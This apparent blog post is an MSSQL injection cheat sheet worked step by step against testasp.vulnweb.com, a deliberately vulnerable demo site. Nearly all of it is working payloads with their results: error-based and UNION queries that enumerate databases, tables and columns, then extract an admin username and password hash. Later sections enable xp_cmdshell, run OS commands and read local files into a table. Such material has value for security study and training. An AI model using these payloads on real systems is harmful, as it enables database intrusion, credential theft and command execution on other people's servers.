MSSQL Injection Cheat Sheet

(((0x1 :- Basic Recon Stage)))

UserName
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())--
acunetix

Check if Website is Vulnerable
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1--%5BTrue%5D
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2--%5BFalse%5D


SQL Server Version 
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))--
Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) 



Server Name
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))--
VPS19760

(((0x2 :- Enumerating Other Databases)))

[Listing Database Names]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))--
master

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))--
tempdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))--
model

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))--
msdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))--
acublog

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))--
acuforum

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))--
acuservice



(((0x3 :- Enumerating Table Names for each database)))
[*]Database : [master]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' ),NULL--
 spt_fallback_db 

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db') ),NULL--

 spt_fallback_dev  

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev') ),NULL--

 spt_fallback_usg 

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev','spt_fallback_usg') ),NULL--

 spt_monitor 

Same Goes On....

[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' ),NULL--
comments



http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments') ),NULL--
news


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments','news') ),NULL--
users

[*]Database : [acuforum]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' ),NULL--




[*]Database : [acuservice]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = 'U' ),NULL--
threads

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads')),NULL--
users

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users')),NULL--
forums

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users','forums')),NULL--
posts


Same...



0x4 :- Fetching Column Name for Tables from Same and other database
Database : [acublog]

 AND acublog..syscolumns.name NOT IN ('uname') ))

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users'--
uname

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname') ))--
upass

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname','upass') ))--
alevel


Same Ways for other queries..

0x5:- Fetching Data from Columns
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;
admin

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;
334c4a4c42fdb79d7ebc3e73b517e6f8


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN ('admin'); 
[For now Not true but can be used if there are more rows to fetch]

(((0x4 :- Enable xp_cmdshell if current_user is 'sa' )))
For strting:
http://testasp.vulnweb.com/showforum.asp?name=test'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--

For integer:
http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--


(((0x5 :- Reading Local File and insert into Table )))

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'C:\output.txt';
DROP TABLE mydata;

(((0x6 :- Execute Command shell )))
'; exec xp_cmdshell 'net user > c:\output.txt';--

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s